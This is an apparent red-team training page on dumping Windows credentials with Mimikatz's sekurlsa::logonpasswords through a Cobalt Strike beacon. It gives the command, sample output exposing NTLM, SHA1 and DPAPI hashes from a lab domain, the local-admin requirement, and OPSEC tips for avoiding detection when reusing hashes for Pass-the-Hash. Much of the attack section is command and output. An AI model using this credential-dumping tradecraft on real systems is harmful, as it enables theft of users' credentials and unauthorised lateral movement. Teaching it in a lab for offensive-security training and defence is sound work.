The `sekurlsa::logonpasswords` command in Mimikatz is infamous for being able to "dump plaintext passwords from memory". Having a users password has clear advantages (see **Make Token**) and was a lucrative tactic for a long time. However, Microsoft have implemented a lot of mitigations in Windows 10 and above (e.g. by disabling [wdigest](https://stealthbits.com/blog/wdigest-clear-text-passwords-stealing-more-than-a-hash/) by default), so happening across plaintext passwords is certainly less common.

This module is still capable of retrieving NTLM hashes which is useful for pairing with the **Pass the Hash** or even cracking to recover the plaintext.

This requires local admin privileges on the host.
```shell
beacon> mimikatz sekurlsa::logonpasswords

Authentication Id : 0 ; 113277 (00000000:0001ba7d)
Session           : Interactive from 1
User Name         : jking
Domain            : DEV
Logon Server      : DC-2
Logon Time        : 5/24/2021 9:00:11 AM
SID               : S-1-5-21-3263068140-2042698922-2891547269-1122
    msv :   
     [00000003] Primary
     * Username : jking
     * Domain   : DEV
     * NTLM     : 4ffd3eabdce2e158d923ddec72de979e
     * SHA1     : b081158da72409badae7b849d12097f2fa02c119
     * DPAPI    : 4180363cf5b2faa2130098adcb3a1db4
    tspkg : 
    wdigest :   
     * Username : jking
     * Domain   : DEV
     * Password : (null)
    kerberos :  
     * Username : jking
     * Domain   : DEV.CYBERBOTIC.IO
     * Password : (null)
    ssp :   
    credman :
```

Cobalt Strike also has a short-hand command for this called `logonpasswords`.

**OPSEC Alert**
>A lot of tradecraft that leverages NTLM are undesirable.
>	-   Pass-the-Hash requires patching LSASS.
>	-   Overpass-the-Hash with NTLM uses a weaker encryption compared to what Windows uses by default.
>
I therefore recommend using SHA hashes from **eKeys** (detailed on the next page). However, real actors are still using NTLM so those techniques are included in this course.

After dumping these credentials, go to **View > Credentials** to see a copy of them. Some of Cobalt Strike workflows (such as the right-click **Beacon > Access > MakeToken** dialog) can pull from this data model.